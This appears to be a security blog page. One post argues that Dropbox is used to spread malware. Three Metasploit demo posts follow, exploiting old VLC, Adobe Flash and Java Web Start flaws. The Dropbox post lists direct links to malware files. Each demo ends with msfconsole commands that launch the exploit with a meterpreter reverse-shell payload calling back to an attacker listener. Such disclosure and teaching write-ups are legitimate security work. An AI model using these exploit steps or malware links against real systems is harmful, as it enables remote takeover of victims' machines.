Should Dropbox be Shutdown for Spreading Mass Malwares ?

Various,

Blog posts on Symantec and ThreatPost have point the fact that Dropbox is used by bad guys to spread spam and phishing campaigns and also malwares. All theses malwares, files used in phishing and spamming campaigns coming from the “Public Folder” of malicious Dropbox accounts. Any file put in this folder gets its own Internet link so that he can be shared with others. Examples of malwares spread by Dropbox :

http://dl.dropbox.com/u/58336523/x/login.php, PHP/IRCBOT used in remote file inclusion campaigns.

http://dl.dropbox.com/u/63038576/Script.exe, WORM/Ainslot.A.1946 used in infection campaigns.

The problem is that Dropbox is not spreading malwares since few days. If you take a look at Clean MX database, Dropbox is present since 2010-04-19, with an explosion of malwares in 2011. The fact that Dropbox spread malwares is real and it is the case since long time. Dropbox is also present in Malc0de database since 2012-02-26.

Compared to other malware spreaders, Dropbox has a privileged status. For example, in November 2011, FileAve.com a free file hosting provider notorious for spreading thousands of malwares were shutdown after years of activities. FileAve.com have provide 50 MB free storage and a free sub domain for each created account (ex : http://yourname.fileave.com). FileAve.com was present in Clean MX database since the 2007-11-30, in Malc0de database since the 2010-01-11 and in our database since the 2009-02-16. The shutdown of FileAve.com was a good news for every one.

We can ask us a legitimate question, should Dropbox be shutdown, same as for FileAve.com ? Aren’t they both malware spreaders ?

CVE-2008-5036 VLC Media Player RealText Subtitle Overflow Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability found by Tobias Klein
Vulnerability reported to the vendor by Tobias Klein the 2008-11-03
Coordinated public release of the vulnerability the 2008-11-05
Metasploit PoC provided the 2012-03-01

PoC provided by :

Tobias Klein
SkD
juan vazquez

Reference(s) :

CVE-2008-5036
OSVDB-49809
VideoLAN-SA-0810
TKADV2008-011

Affected version(s) :

VLC media player 0.9.5 down to 0.5.0

Tested on Windows XP Pro SP3 with :

VLC 0.9.4

Description :

This module exploits a stack buffer overflow vulnerability in VideoLAN VLC before 0.9.6. The vulnerability exists in the parsing of RealText subtitle files. In order to exploit this, this module will generate two files: The .mp4 file is used to trick your victim into running. The .rt file is the actual malicious file that triggers the vulnerability, which should be placed under the same directory as the .mp4 file.

Commands :

use exploit/windows/fileformat/vlc_realtext
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

use exploit/multi/handler
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid

CVE-2012-0754 Adobe Flash Player MP4 Overflow Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability found by Alexander Gavrun from ZDI
Vulnerability reported to the vendor by ZDI the 2012-01-12
Coordinated public release of the vulnerability the 2012-02-15
Vulnerability found exploited in the wild by contagio the 2012-03-02
Metasploit PoC provided the 2012-03-07

PoC provided by :

Alexander Gavrun
sinn3r
juan vazquez

Reference(s) :

CVE-2012-0754
OSVDB-79300
APSB12-03
ZDI-12-080
contagio

Affected version(s) :

Adobe Flash Player 11.1.102.55 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems
Adobe Flash Player 11.1.112.61 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.5 and earlier versions for Android 3.x and 2.x

Tested on Windows XP Pro SP3 with :

Adobe Flash Player 11.1.102.55
Internet Explorer 8

Description :

This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt .mp4 file loaded by Flash, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the “Iran’s Oil and Nuclear Situation.doc” e-mail attack.

Commands :

use exploit/windows/browser/adobe_flash_mp4_cprt
set SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-0500 Oracle Java Web Start Plugin Command Line Argument Injection Metasploit Demo

Exploits, Metasploit, , , ,

Timeline :

Vulnerability “ZDI-12-037” reported by Chris Ries to ZDI
Vulnerability reported to the vendor by ZDI the 2011-10-28 for “ZDI-12-037”
Coordinated public release of the vulnerability the 2012-02-22
Metasploit PoC provided the 2012-02-23

PoC provided by :

jduck

Reference(s) :

CVE-2012-0500
OSVDB-79227
ZDI-12-037
TSL20120214-01
Oracle Java SE Critical Patch Update Advisory – February 2012

Affected version(s) :

Oracle Java Development Kit (JDK) 6 Update 30 and prior
Oracle Java Development Kit (JDK) 7 Update 2 and prior
Oracle JavaFX 2.0.2 and prior
Oracle Java Runtime Environment (JRE) 6 Update 30 and prior
Oracle Java Runtime Environment (JRE) 7 Update 2 and prior

Tested on Windows XP Pro SP3 with :

Java 6 Update 30
Internet Explorer 8

Description :

This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.

Commands :

use exploit/windows/browser/java_ws_vmargs
set SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid